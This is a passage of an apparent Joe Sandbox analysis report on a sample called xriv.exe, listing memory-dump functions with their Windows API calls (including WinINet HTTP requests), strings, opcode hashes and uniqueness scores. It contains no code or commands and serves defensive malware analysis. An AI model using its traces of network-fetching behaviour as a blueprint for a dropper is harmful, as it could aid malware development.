                              • _free.LIBCMT ref: 0139177F
                              • _free.LIBCMT ref: 0139178A
                              • _free.LIBCMT ref: 013917C2
                              • _free.LIBCMT ref: 013917C9
                              • _free.LIBCMT ref: 013917E6
                              • _free.LIBCMT ref: 013917FE
                              Memory Dump Source
                              • Source File: 00000008.00000002.446805232.0000000001371000.00000020.00000001.01000000.00000009.sdmp, Offset: 01370000, based on PE: true
                              • Associated: 00000008.00000002.446790406.0000000001370000.00000002.00000001.01000000.00000009.sdmp
                              • Associated: 00000008.00000002.446840556.000000000139E000.00000002.00000001.01000000.00000009.sdmp
                              • Associated: 00000008.00000002.446853837.00000000013A8000.00000004.00000001.01000000.00000009.sdmp
                              • Associated: 00000008.00000002.446872459.00000000013AD000.00000002.00000001.01000000.00000009.sdmp
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_8_2_1370000_xriv.jbxd
                              Yara matches
                              Similarity
                              • API ID: _free$ErrorFreeHeapLast___free_lconv_mon
                              • String ID:
                              • API String ID: 161543041-0
                              • Opcode ID: fbf84e8fd6dd4c9ed373ae9a625eb171d1ee7e34edf44b9680150ffc25ab73c7
                              • Instruction ID: 31bb184e709f21df70e7d2ed2ceea0439bf35b466cd808f97c48d8c66da53b3f
                              • Opcode Fuzzy Hash: fbf84e8fd6dd4c9ed373ae9a625eb171d1ee7e34edf44b9680150ffc25ab73c7
                              • Instruction Fuzzy Hash: 5C312A356043079FEF21AB7DD844B5E77E9EF0067CF54882AE559E7190DA70E980CB24
                              Uniqueness

                              Uniqueness Score: -1.00%

                              APIs
                              • IsInExceptionSpec.LIBVCRUNTIME ref: 01388CC2
                              • type_info::operator==.LIBVCRUNTIME ref: 01388CE9
                              • ___TypeMatch.LIBVCRUNTIME ref: 01388DF5
                              • IsInExceptionSpec.LIBVCRUNTIME ref: 01388ED0
                              • _UnwindNestedFrames.LIBCMT ref: 01388F57
                              • CallUnexpected.LIBVCRUNTIME ref: 01388F72
                              Strings
                              Memory Dump Source
                              • Source File: 00000008.00000002.446805232.0000000001371000.00000020.00000001.01000000.00000009.sdmp, Offset: 01370000, based on PE: true
                              • Associated: 00000008.00000002.446790406.0000000001370000.00000002.00000001.01000000.00000009.sdmp
                              • Associated: 00000008.00000002.446840556.000000000139E000.00000002.00000001.01000000.00000009.sdmp
                              • Associated: 00000008.00000002.446853837.00000000013A8000.00000004.00000001.01000000.00000009.sdmp
                              • Associated: 00000008.00000002.446872459.00000000013AD000.00000002.00000001.01000000.00000009.sdmp
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_8_2_1370000_xriv.jbxd
                              Yara matches
                              Similarity
                              • API ID: ExceptionSpec$CallFramesMatchNestedTypeUnexpectedUnwindtype_info::operator==
                              • String ID: csm$csm$csm
                              • API String ID: 2123188842-393685449
                              • Opcode ID: 7c0d9d66f214063ae089b1d36cfeb8a61220e71c2031bf0bcb1cfea7418faf21
                              • Instruction ID: 30199b1dd22fbc03c6820dc0593a35ced50f122a8d8d6a859f8bd3ef9de90978
                              • Opcode Fuzzy Hash: 7c0d9d66f214063ae089b1d36cfeb8a61220e71c2031bf0bcb1cfea7418faf21
                              • Instruction Fuzzy Hash: B4C19E7180030AEFCF29FF98D8809AEBBB5BF14318F84459AE9056B252D331DA55CB91
                              Uniqueness

                              Uniqueness Score: -1.00%

                              APIs
                              • _free.LIBCMT ref: 0138DE42
                                • Part of subcall function 0138D653: HeapFree.KERNEL32(00000000,00000000,?,0139142F,?,00000000,?,?,?,01391456,?,00000007,?,?,01391858,?), ref: 0138D669
                                • Part of subcall function 0138D653: GetLastError.KERNEL32(?,?,0139142F,?,00000000,?,?,?,01391456,?,00000007,?,?,01391858,?,?), ref: 0138D67B
                              • _free.LIBCMT ref: 0138DE4E
                              • _free.LIBCMT ref: 0138DE59
                              • _free.LIBCMT ref: 0138DE64
                              • _free.LIBCMT ref: 0138DE6F
                              • _free.LIBCMT ref: 0138DE7A
                              • _free.LIBCMT ref: 0138DE85
                              • _free.LIBCMT ref: 0138DE90
                              • _free.LIBCMT ref: 0138DE9B
                              • _free.LIBCMT ref: 0138DEA9
                              Memory Dump Source
                              • Source File: 00000008.00000002.446805232.0000000001371000.00000020.00000001.01000000.00000009.sdmp, Offset: 01370000, based on PE: true
                              • Associated: 00000008.00000002.446790406.0000000001370000.00000002.00000001.01000000.00000009.sdmp
                              • Associated: 00000008.00000002.446840556.000000000139E000.00000002.00000001.01000000.00000009.sdmp
                              • Associated: 00000008.00000002.446853837.00000000013A8000.00000004.00000001.01000000.00000009.sdmp
                              • Associated: 00000008.00000002.446872459.00000000013AD000.00000002.00000001.01000000.00000009.sdmp
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_8_2_1370000_xriv.jbxd
                              Yara matches
                              Similarity
                              • API ID: _free$ErrorFreeHeapLast
                              • String ID:
                              • API String ID: 776569668-0
                              • Opcode ID: c8ff170345eff379a61a0fc6cc64f07317c51fa810498030fcb39022a501c48b
                              • Instruction ID: 6b063b843eb6b6fa52912475b2cacb385c9654a0775b7eaad43fe1d7b3ec873d
                              • Opcode Fuzzy Hash: c8ff170345eff379a61a0fc6cc64f07317c51fa810498030fcb39022a501c48b
                              • Instruction Fuzzy Hash: A521AD7690420EAFCB41EFD8C840DDD7BB9BF18658F418165F5199B160DB71D684CB80
                              Uniqueness

                              Uniqueness Score: -1.00%

                              APIs
                              • InternetOpenW.WININET(013A3F6C,00000000,00000000,00000000,00000000), ref: 0137871C
                              • InternetConnectA.WININET(00000000,?,00000050,00000000,00000000,00000003,00000000,00000001), ref: 01378740
                              • HttpOpenRequestA.WININET(?,00000000), ref: 0137878A
                              • HttpSendRequestA.WININET(?,00000000), ref: 0137884A
                              • InternetReadFile.WININET(?,?,000003FF,?), ref: 013788FC
                              • InternetReadFile.WININET(?,00000000,000003FF,?), ref: 013789B0
                              • InternetCloseHandle.WININET(?), ref: 013789D7
                              • InternetCloseHandle.WININET(?), ref: 013789DF
                              • InternetCloseHandle.WININET(?), ref: 013789E7
                              Memory Dump Source
                              • Source File: 00000008.00000002.446805232.0000000001371000.00000020.00000001.01000000.00000009.sdmp, Offset: 01370000, based on PE: true
                              • Associated: 00000008.00000002.446790406.0000000001370000.00000002.00000001.01000000.00000009.sdmp
                              • Associated: 00000008.00000002.446840556.000000000139E000.00000002.00000001.01000000.00000009.sdmp
                              • Associated: 00000008.00000002.446853837.00000000013A8000.00000004.00000001.01000000.00000009.sdmp
                              • Associated: 00000008.00000002.446872459.00000000013AD000.00000002.00000001.01000000.00000009.sdmp
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_8_2_1370000_xriv.jbxd
                              Yara matches
                              Similarity
                              • API ID: Internet$CloseHandle$FileHttpOpenReadRequest$ConnectSend
                              • String ID:
                              • API String ID: 1354133546-0
                              • Opcode ID: f2d29a2b89effa52cc61d4920276fd5b0a7cbc72d2bbd76c8a3088c0e9884ea3
                              • Instruction ID: 847181a3b602de6e61034ea0a546af310643b8cc85ce2b1a5a996acca482e83c
                              • Opcode Fuzzy Hash: f2d29a2b89effa52cc61d4920276fd5b0a7cbc72d2bbd76c8a3088c0e9884ea3
                              • Instruction Fuzzy Hash: CDC1F6B0A101189BEB28DF28CC88BEDBF75EF41318F5481D8E60997291D7799AC0CF95
                              Uniqueness

                              Uniqueness Score: -1.00%

                              Memory Dump Source
                              • Source File: 00000008.00000002.446805232.0000000001371000.00000020.00000001.01000000.00000009.sdmp, Offset: 01370000, based on PE: true
                              • Associated: 00000008.00000002.446790406.0000000001370000.00000002.00000001.01000000.00000009.sdmp
                              • Associated: 00000008.00000002.446840556.000000000139E000.00000002.00000001.01000000.00000009.sdmp
                              • Associated: 00000008.00000002.446853837.00000000013A8000.00000004.00000001.01000000.00000009.sdmp
                              • Associated: 00000008.00000002.446872459.00000000013AD000.00000002.00000001.01000000.00000009.sdmp
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_8_2_1370000_xriv.jbxd
                              Yara matches
                              Similarity
                              • API ID:
                              • String ID:
                              • API String ID:
                              • Opcode ID: 8c1b03a0d3e4f281c52e89a3f485315f5c6f1fa307384b9b1325642ecd42ae7e
                              • Instruction ID: 2e8d8eb6243566e6805acd3f452bd07230e7f3202e083348224bc82434619e77
                              • Opcode Fuzzy Hash: 8c1b03a0d3e4f281c52e89a3f485315f5c6f1fa307384b9b1325642ecd42ae7e
                              • Instruction Fuzzy Hash: 62C1D771E0434AAFEF12DF9DD880BADBBB5AF49318F04405AE555AB386C7309981CF61
                              Uniqueness

                              Uniqueness Score: -1.00%

                              APIs
                              Memory Dump Source
                              • Source File: 00000008.00000002.446805232.0000000001371000.00000020.00000001.01000000.00000009.sdmp, Offset: 01370000, based on PE: true
                              • Associated: 00000008.00000002.446790406.0000000001370000.00000002.00000001.01000000.00000009.sdmp
                              • Associated: 00000008.00000002.446840556.000000000139E000.00000002.00000001.01000000.00000009.sdmp
                              • Associated: 00000008.00000002.446853837.00000000013A8000.00000004.00000001.01000000.00000009.sdmp
                              • Associated: 00000008.00000002.446872459.00000000013AD000.00000002.00000001.01000000.00000009.sdmp
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_8_2_1370000_xriv.jbxd
                              Yara matches
                              Similarity
                              • API ID: _free$___from_strstr_to_strchr
                              • String ID:
                              • API String ID: 3409252457-0
                              • Opcode ID: f0214389d01e24b23d970b492dd50e36d9adbea5adfb974a485ce11dfa5281a3
                              • Instruction ID: f3a595affd674c693366c8da595ddbc0af82aa3519728e2d978417ce2ad8b26c
                              • Opcode Fuzzy Hash: f0214389d01e24b23d970b492dd50e36d9adbea5adfb974a485ce11dfa5281a3
                              • Instruction Fuzzy Hash: 7A51F571944386AFEF29BFBC8880A6D7BFCAF0171CF04416AFA15AB285DB718140CB55
                              Uniqueness

                              Uniqueness Score: -1.00%

                              APIs
                              • _ValidateLocalCookies.LIBCMT ref: 013885A7
                              • ___except_validate_context_record.LIBVCRUNTIME ref: 013885AF
                              • _ValidateLocalCookies.LIBCMT ref: 01388638
                              • __IsNonwritableInCurrentImage.LIBCMT ref: 01388663
                              • _ValidateLocalCookies.LIBCMT ref: 013886B8
                              Strings
                              Memory Dump Source
                              • Source File: 00000008.00000002.446805232.0000000001371000.00000020.00000001.01000000.00000009.sdmp, Offset: 01370000, based on PE: true
                              • Associated: 00000008.00000002.446790406.0000000001370000.00000002.00000001.01000000.00000009.sdmp
                              • Associated: 00000008.00000002.446840556.000000000139E000.00000002.00000001.01000000.00000009.sdmp
                              • Associated: 00000008.00000002.446853837.00000000013A8000.00000004.00000001.01000000.00000009.sdmp
                              • Associated: 00000008.00000002.446872459.00000000013AD000.00000002.00000001.01000000.00000009.sdmp
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_8_2_1370000_xriv.jbxd
                              Yara matches
                              Similarity
                              • API ID: CookiesLocalValidate$CurrentImageNonwritable___except_validate_context_record
                              • String ID: csm
                              • API String ID: 1170836740-1018135373
                              • Opcode ID: d008ab2c99ec83fd0d633baa9372bdd24fcfca22840353700a101542667ddd2d
                              • Instruction ID: 5aff8e76d1f78a5fc39131afe895d4061b92a4869a676ce1f6a1641c4451c19d
                              • Opcode Fuzzy Hash: d008ab2c99ec83fd0d633baa9372bdd24fcfca22840353700a101542667ddd2d
                              • Instruction Fuzzy Hash: EE418F34A00319EBCF10EF6CC884AAEBFB5AF5532CF548195EA159B352D731AA01CF91
                              Uniqueness

                              Uniqueness Score: -1.00%

                              Strings
                              Memory Dump Source
                              • Source File: 00000008.00000002.446805232.0000000001371000.00000020.00000001.01000000.00000009.sdmp, Offset: 01370000, based on PE: true
                              • Associated: 00000008.00000002.446790406.0000000001370000.00000002.00000001.01000000.00000009.sdmp
                              • Associated: 00000008.00000002.446840556.000000000139E000.00000002.00000001.01000000.00000009.sdmp
                              • Associated: 00000008.00000002.446853837.00000000013A8000.00000004.00000001.01000000.00000009.sdmp
                              • Associated: 00000008.00000002.446872459.00000000013AD000.00000002.00000001.01000000.00000009.sdmp
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_8_2_1370000_xriv.jbxd
                              Yara matches
                              Similarity
                              • API ID:
                              • String ID: api-ms-$ext-ms-
                              • API String ID: 0-537541572
                              • Opcode ID: 682ae3c8339424a25670e5f708ac30b0a3142ff8b809cca5f8f76d74dc850084
                              • Instruction ID: 9ed59d6280ce078ee16f5a6b357f35b321061077af27b5474ba14b85a0a572e3
                              • Opcode Fuzzy Hash: 682ae3c8339424a25670e5f708ac30b0a3142ff8b809cca5f8f76d74dc850084
                              • Instruction Fuzzy Hash: C221E772A41325BFEB32BB6DDC44A5E3B5C9F557A8F150234ED06A7685D631E80086E0
                              Uniqueness

                              Uniqueness Score: -1.00%

                              APIs
                                • Part of subcall function 01391405: _free.LIBCMT ref: 0139142A
                              • _free.LIBCMT ref: 0139148B
                                • Part of subcall function 0138D653: HeapFree.KERNEL32(00000000,00000000,?,0139142F,?,00000000,?,?,?,01391456,?,00000007,?,?,01391858,?), ref: 0138D669
                                • Part of subcall function 0138D653: GetLastError.KERNEL32(?,?,0139142F,?,00000000,?,?,?,01391456,?,00000007,?,?,01391858,?,?), ref: 0138D67B
                              • _free.LIBCMT ref: 01391496
                              • _free.LIBCMT ref: 013914A1
                              • _free.LIBCMT ref: 013914F5
                              • _free.LIBCMT ref: 01391500
                              • _free.LIBCMT ref: 0139150B
                              • _free.LIBCMT ref: 01391516
                              Memory Dump Source
                              • Source File: 00000008.00000002.446805232.0000000001371000.00000020.00000001.01000000.00000009.sdmp, Offset: 01370000, based on PE: true
                              • Associated: 00000008.00000002.446790406.0000000001370000.00000002.00000001.01000000.00000009.sdmp
                              • Associated: 00000008.00000002.446840556.000000000139E000.00000002.00000001.01000000.00000009.sdmp
                              • Associated: 00000008.00000002.446853837.00000000013A8000.00000004.00000001.01000000.00000009.sdmp
                              • Associated: 00000008.00000002.446872459.00000000013AD000.00000002.00000001.01000000.00000009.sdmp
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_8_2_1370000_xriv.jbxd
                              Yara matches
                              Similarity
                              • API ID: _free$ErrorFreeHeapLast
                              • String ID:
                              • API String ID: 776569668-0
                              • Opcode ID: 745ba4c7df38b0c8b3501d58b22aa89868de86b005191e755d783c3d27d16807
                              • Instruction ID: 2557e8f73ebaec5c890357d5ad7475af586d3ab2e281c852464aa8f0807e4a0c
                              • Opcode Fuzzy Hash: 745ba4c7df38b0c8b3501d58b22aa89868de86b005191e755d783c3d27d16807
                              • Instruction Fuzzy Hash: 71118172540B0BAADB20BFB5CC05FCB77BC9F18729F818815A29DBA090DA28B545C794
                              Uniqueness

                              Uniqueness Score: -1.00%

                              APIs
                              • GetConsoleCP.KERNEL32(?,01375140,00000000), ref: 01392B40
                              • __fassign.LIBCMT ref: 01392D1F
                              • __fassign.LIBCMT ref: 01392D3C
                              • WriteFile.KERNEL32(?,01375140,00000000,?,00000000,?,?,?,?,?,?,?,?,?,?,00000000), ref: 01392D84
                              • WriteFile.KERNEL32(?,?,00000001,?,00000000), ref: 01392DC4
                              • GetLastError.KERNEL32(?,?,?,?,?,?,?,?,?,?,00000000), ref: 01392E70
                              Memory Dump Source
                              • Source File: 00000008.00000002.446805232.0000000001371000.00000020.00000001.01000000.00000009.sdmp, Offset: 01370000, based on PE: true
                              • Associated: 00000008.00000002.446790406.0000000001370000.00000002.00000001.01000000.00000009.sdmp
                              • Associated: 00000008.00000002.446840556.000000000139E000.00000002.00000001.01000000.00000009.sdmp
                              • Associated: 00000008.00000002.446853837.00000000013A8000.00000004.00000001.01000000.00000009.sdmp
                              • Associated: 00000008.00000002.446872459.00000000013AD000.00000002.00000001.01000000.00000009.sdmp
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_8_2_1370000_xriv.jbxd
                              Yara matches
                              Similarity
                              • API ID: FileWrite__fassign$ConsoleErrorLast
                              • String ID:
                              • API String ID: 4031098158-0
                              • Opcode ID: 040a36e02210f7ead16500e4ab56a4b692c30250ff0f77f5c72a95fe41afbcb9
                              • Instruction ID: 29548ac8c35e2bb1cf5918938cc58f0628149d4390ad76c6f473bb048780e53b
                              • Opcode Fuzzy Hash: 040a36e02210f7ead16500e4ab56a4b692c30250ff0f77f5c72a95fe41afbcb9
                              • Instruction Fuzzy Hash: B5D1AF71D00659AFDF15CFE8C8809EEBBB9BF48318F284169E959BB341D630A946CF50
                              Uniqueness

                              Uniqueness Score: -1.00%

                              APIs
                              • GetLastError.KERNEL32(?,?,01388887,01388476,01387AC4), ref: 0138889E
                              • ___vcrt_FlsGetValue.LIBVCRUNTIME ref: 013888AC
                              • ___vcrt_FlsSetValue.LIBVCRUNTIME ref: 013888C5
                              • SetLastError.KERNEL32(00000000,01388887,01388476,01387AC4), ref: 01388917
                              Memory Dump Source
                              • Source File: 00000008.00000002.446805232.0000000001371000.00000020.00000001.01000000.00000009.sdmp, Offset: 01370000, based on PE: true
                              • Associated: 00000008.00000002.446790406.0000000001370000.00000002.00000001.01000000.00000009.sdmp
                              • Associated: 00000008.00000002.446840556.000000000139E000.00000002.00000001.01000000.00000009.sdmp
                              • Associated: 00000008.00000002.446853837.00000000013A8000.00000004.00000001.01000000.00000009.sdmp
                              • Associated: 00000008.00000002.446872459.00000000013AD000.00000002.00000001.01000000.00000009.sdmp
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_8_2_1370000_xriv.jbxd
                              Yara matches
                              Similarity
                              • API ID: ErrorLastValue___vcrt_
                              • String ID:
                              • API String ID: 3852720340-0
                              • Opcode ID: cdf32490b1b07271eb1995ec6339b31c6a07159f907b371f15b0fb0857bf6765
                              • Instruction ID: 4a9205488626b780e275fe47c34799086275137f11d24e9770a2da41ea8ad5ff
                              • Opcode Fuzzy Hash: cdf32490b1b07271eb1995ec6339b31c6a07159f907b371f15b0fb0857bf6765
                              • Instruction Fuzzy Hash: 0701D8329293126EFA35777D7C84A677A9CEF417FEB600269E520414D5EE1648004341
                              Uniqueness

                              Uniqueness Score: -1.00%

                              Strings
                              • C:\Users\user\AppData\Local\Temp\IXP000.TMP\xriv.exe, xrefs: 01390033
                              Memory Dump Source
                              • Source File: 00000008.00000002.446805232.0000000001371000.00000020.00000001.01000000.00000009.sdmp, Offset: 01370000, based on PE: true
                              • Associated: 00000008.00000002.446790406.0000000001370000.00000002.00000001.01000000.00000009.sdmp
                              • Associated: 00000008.00000002.446840556.000000000139E000.00000002.00000001.01000000.00000009.sdmp
                              • Associated: 00000008.00000002.446853837.00000000013A8000.00000004.00000001.01000000.00000009.sdmp
                              • Associated: 00000008.00000002.446872459.00000000013AD000.00000002.00000001.01000000.00000009.sdmp
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_8_2_1370000_xriv.jbxd
                              Yara matches
                              Similarity
                              • API ID:
                              • String ID: C:\Users\user\AppData\Local\Temp\IXP000.TMP\xriv.exe
                              • API String ID: 0-203307410
                              • Opcode ID: 90a383f4fe7fdcc84f96f5f2a1d10d24bb267cd80079698fc677477476bdd4d5
                              • Instruction ID: d0f60ddc17ac581610d989f0259abe9e5b38402b809b8a52c6a787a552c9f743
                              • Opcode Fuzzy Hash: 90a383f4fe7fdcc84f96f5f2a1d10d24bb267cd80079698fc677477476bdd4d5
                              • Instruction Fuzzy Hash: E7219F7160420BAFEF25BF6D8C8096BB7ADEF0026C7104524FA2996351EB31EC5087A0
                              Uniqueness

                              Uniqueness Score: -1.00%

                              APIs
                              Strings
                              Memory Dump Source
                              • Source File: 00000008.00000002.446805232.0000000001371000.00000020.00000001.01000000.00000009.sdmp, Offset: 01370000, based on PE: true
                              • Associated: 00000008.00000002.446790406.0000000001370000.00000002.00000001.01000000.00000009.sdmp
                              • Associated: 00000008.00000002.446840556.000000000139E000.00000002.00000001.01000000.00000009.sdmp
                              • Associated: 00000008.00000002.446853837.00000000013A8000.00000004.00000001.01000000.00000009.sdmp
                              • Associated: 00000008.00000002.446872459.00000000013AD000.00000002.00000001.01000000.00000009.sdmp
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_8_2_1370000_xriv.jbxd
                              Yara matches
                              Similarity
                              • API ID: _wcsrchr
                              • String ID: .bat$.cmd$.com$.exe
                              • API String ID: 1752292252-4019086052
                              • Opcode ID: 1d9cccba6b3fd3da45253653e595a07812f077e55d050dad5bb8ff4329702273
                              • Instruction ID: cb58834189a4a4dd1cfc5343e4cbf582a12afe70d3a4cb7c5860d0b24c4d97dd
                              • Opcode Fuzzy Hash: 1d9cccba6b3fd3da45253653e595a07812f077e55d050dad5bb8ff4329702273
                              • Instruction Fuzzy Hash: 6401963BA0472765FB15321EAC01667BBAC9BD2ABC726002EF958F7385EE55D84341A0
                              Uniqueness

                              Uniqueness Score: -1.00%

                              Strings
                              Memory Dump Source
                              • Source File: 00000008.00000002.446805232.0000000001371000.00000020.00000001.01000000.00000009.sdmp, Offset: 01370000, based on PE: true
                              • Associated: 00000008.00000002.446790406.0000000001370000.00000002.00000001.01000000.00000009.sdmp
                              • Associated: 00000008.00000002.446840556.000000000139E000.00000002.00000001.01000000.00000009.sdmp
                              • Associated: 00000008.00000002.446853837.00000000013A8000.00000004.00000001.01000000.00000009.sdmp
                              • Associated: 00000008.00000002.446872459.00000000013AD000.00000002.00000001.01000000.00000009.sdmp
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_8_2_1370000_xriv.jbxd
                              Yara matches
                              Similarity
                              • API ID:
                              • String ID: api-ms-
                              • API String ID: 0-2084034818
                              • Opcode ID: b49ffd2d647426565dbfd5c46e642497c34384ee9355f54fe9677ec80e584eb7
                              • Instruction ID: e1ca932fc0db6ac0fa2181860cb61955e951785e067c885d430aca02c29b79b8
                              • Opcode Fuzzy Hash: b49ffd2d647426565dbfd5c46e642497c34384ee9355f54fe9677ec80e584eb7
                              • Instruction Fuzzy Hash: B011B972A05327ABDB32AB2DDC44B7A375C9B817BCF110521E906A7285D630ED0087D1
                              Uniqueness

                              Uniqueness Score: -1.00%

                              APIs
                              • GetModuleHandleExW.KERNEL32(00000000,mscoree.dll,00000000,?,?,0138A9D8,0138E000,?,0138A9A0,0138AF26,?,0138E000), ref: 0138A9F8
                              • GetProcAddress.KERNEL32(00000000,CorExitProcess), ref: 0138AA0B
                              • FreeLibrary.KERNEL32(00000000,?,?,0138A9D8,0138E000,?,0138A9A0,0138AF26,?,0138E000), ref: 0138AA2E
                              Strings
                              Memory Dump Source
                              • Source File: 00000008.00000002.446805232.0000000001371000.00000020.00000001.01000000.00000009.sdmp, Offset: 01370000, based on PE: true
                              • Associated: 00000008.00000002.446790406.0000000001370000.00000002.00000001.01000000.00000009.sdmp
                              • Associated: 00000008.00000002.446840556.000000000139E000.00000002.00000001.01000000.00000009.sdmp
                              • Associated: 00000008.00000002.446853837.00000000013A8000.00000004.00000001.01000000.00000009.sdmp
                              • Associated: 00000008.00000002.446872459.00000000013AD000.00000002.00000001.01000000.00000009.sdmp
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_8_2_1370000_xriv.jbxd
                              Yara matches
                              Similarity
                              • API ID: AddressFreeHandleLibraryModuleProc
                              • String ID: CorExitProcess$mscoree.dll
                              • API String ID: 4061214504-1276376045
                              • Opcode ID: 72abf1e332238965ab09c87d8c13c41818184a7a3e8f70bfeb77645a74d304f5
                              • Instruction ID: 728a52c32e5ccde31a8e002723498c875ba9e7b5c4f547d7e8819a9e51775264
                              • Opcode Fuzzy Hash: 72abf1e332238965ab09c87d8c13c41818184a7a3e8f70bfeb77645a74d304f5
                              • Instruction Fuzzy Hash: BBF0A731501218FBEB21EB65DE0DBDDBE7CEB0475AF100064F601E2250DB798E10DB90
                              Uniqueness

                              Uniqueness Score: -1.00%

                              APIs
                              • GetCPInfo.KERNEL32(0143CB30,0143CB30,?,7FFFFFFF,?,?,01396325,0143CB30,0143CB30,?,0143CB30,?,?,?,?,0143CB30), ref: 0139610C
                              • __alloca_probe_16.LIBCMT ref: 013961C2
                              • __alloca_probe_16.LIBCMT ref: 01396258
                              • __freea.LIBCMT ref: 013962C3
                              • __freea.LIBCMT ref: 013962CF
                              Memory Dump Source
                              • Source File: 00000008.00000002.446805232.0000000001371000.00000020.00000001.01000000.00000009.sdmp, Offset: 01370000, based on PE: true
                              • Associated: 00000008.00000002.446790406.0000000001370000.00000002.00000001.01000000.00000009.sdmp
                              • Associated: 00000008.00000002.446840556.000000000139E000.00000002.00000001.01000000.00000009.sdmp
                              • Associated: 00000008.00000002.446853837.00000000013A8000.00000004.00000001.01000000.00000009.sdmp
                              • Associated: 00000008.00000002.446872459.00000000013AD000.00000002.00000001.01000000.00000009.sdmp
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_8_2_1370000_xriv.jbxd
                              Yara matches
                              Similarity
                              • API ID: __alloca_probe_16__freea$Info
                              • String ID:
                              • API String ID: 2330168043-0
                              • Opcode ID: 8d18291aa9200dbe10421e86b80eafb3a9e75139aa75c4c0573db89e4178b250
                              • Instruction ID: 8ac9f6d57d89a0bfe2a2fa9eb99e5784a8233ec5b91a1b6435ccc2743d51924d
                              • Opcode Fuzzy Hash: 8d18291aa9200dbe10421e86b80eafb3a9e75139aa75c4c0573db89e4178b250
                              • Instruction Fuzzy Hash: AC81A7F2D0221A5BDF219FA8CC82AEE7BB9DF5925CF180195E944A7241D725CC40CBA0
                              Uniqueness

                              Uniqueness Score: -1.00%

                              APIs
                              • __alloca_probe_16.LIBCMT ref: 01394A18
                              • __alloca_probe_16.LIBCMT ref: 01394ADE
                              • __freea.LIBCMT ref: 01394B4A
                                • Part of subcall function 0138DB3C: RtlAllocateHeap.NTDLL(00000000,?,?,?,01388272,?,?,?,?,?,013720C3,?,?), ref: 0138DB6E
                              • __freea.LIBCMT ref: 01394B53
                              • __freea.LIBCMT ref: 01394B76
                              Memory Dump Source
                              • Source File: 00000008.00000002.446805232.0000000001371000.00000020.00000001.01000000.00000009.sdmp, Offset: 01370000, based on PE: true
                              • Associated: 00000008.00000002.446790406.0000000001370000.00000002.00000001.01000000.00000009.sdmp
                              • Associated: 00000008.00000002.446840556.000000000139E000.00000002.00000001.01000000.00000009.sdmp
                              • Associated: 00000008.00000002.446853837.00000000013A8000.00000004.00000001.01000000.00000009.sdmp
                              • Associated: 00000008.00000002.446872459.00000000013AD000.00000002.00000001.01000000.00000009.sdmp
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_8_2_1370000_xriv.jbxd
                              Yara matches
                              Similarity
                              • API ID: __freea$__alloca_probe_16$AllocateHeap
                              • String ID:
                              • API String ID: 1423051803-0
                              • Opcode ID: 467b6c41b2b9d1a55150c195819821dd3999e82eb94f4e3450325859202fc9c7
                              • Instruction ID: e875f9c141acbf4a4bcfdaf12470c4802d56aa7853ddbba6efc3e4faee40b356
                              • Opcode Fuzzy Hash: 467b6c41b2b9d1a55150c195819821dd3999e82eb94f4e3450325859202fc9c7
                              • Instruction Fuzzy Hash: 0151F17250020BABEF259F69DD40FBF7BA9DF50668F194128FE08A7140E734DC1286A0
                              Uniqueness

                              Uniqueness Score: -1.00%

                              APIs
                              • GetFileType.KERNEL32(?,?,00000000,00000000,?,?,?,?,?,?,?,?,?,?,?,0138B0E0), ref: 0138B1D0
                              • GetFileInformationByHandle.KERNEL32(?,?), ref: 0138B22A
                              • GetLastError.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,0138B0E0,?,000000FF,00000000,00000000), ref: 0138B2B8
                              • __dosmaperr.LIBCMT ref: 0138B2BF
                              • PeekNamedPipe.KERNEL32(?,00000000,00000000,00000000,?,00000000), ref: 0138B2FC
                                • Part of subcall function 0138B524: __dosmaperr.LIBCMT ref: 0138B559
                              Memory Dump Source
                              • Source File: 00000008.00000002.446805232.0000000001371000.00000020.00000001.01000000.00000009.sdmp, Offset: 01370000, based on PE: true
                              • Associated: 00000008.00000002.446790406.0000000001370000.00000002.00000001.01000000.00000009.sdmp
                              • Associated: 00000008.00000002.446840556.000000000139E000.00000002.00000001.01000000.00000009.sdmp
                              • Associated: 00000008.00000002.446853837.00000000013A8000.00000004.00000001.01000000.00000009.sdmp
                              • Associated: 00000008.00000002.446872459.00000000013AD000.00000002.00000001.01000000.00000009.sdmp
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_8_2_1370000_xriv.jbxd
                              Yara matches
                              Similarity
                              • API ID: File__dosmaperr$ErrorHandleInformationLastNamedPeekPipeType
                              • String ID:
                              • API String ID: 1206951868-0
                              • Opcode ID: effd2a4a59af1ee8e4ecac8380d766e44507bd3f338dd5bff7d7ca975c25cc00
                              • Instruction ID: 4389f6664eee2dd6953357ed70c9f57ad04798b2511648a8b2a08f90da6ef4bb
                              • Opcode Fuzzy Hash: effd2a4a59af1ee8e4ecac8380d766e44507bd3f338dd5bff7d7ca975c25cc00
                              • Instruction Fuzzy Hash: F7414B7590070AAFDB24EFB9D8459AFFBF9EF88304B00452EE956D3614EB319904CB21
                              Uniqueness

                              Uniqueness Score: -1.00%

                              APIs
                              • _free.LIBCMT ref: 013913B4
                                • Part of subcall function 0138D653: HeapFree.KERNEL32(00000000,00000000,?,0139142F,?,00000000,?,?,?,01391456,?,00000007,?,?,01391858,?), ref: 0138D669
                                • Part of subcall function 0138D653: GetLastError.KERNEL32(?,?,0139142F,?,00000000,?,?,?,01391456,?,00000007,?,?,01391858,?,?), ref: 0138D67B
                              • _free.LIBCMT ref: 013913C6
                              • _free.LIBCMT ref: 013913D8
                              • _free.LIBCMT ref: 013913EA
                              • _free.LIBCMT ref: 013913FC
                              Memory Dump Source
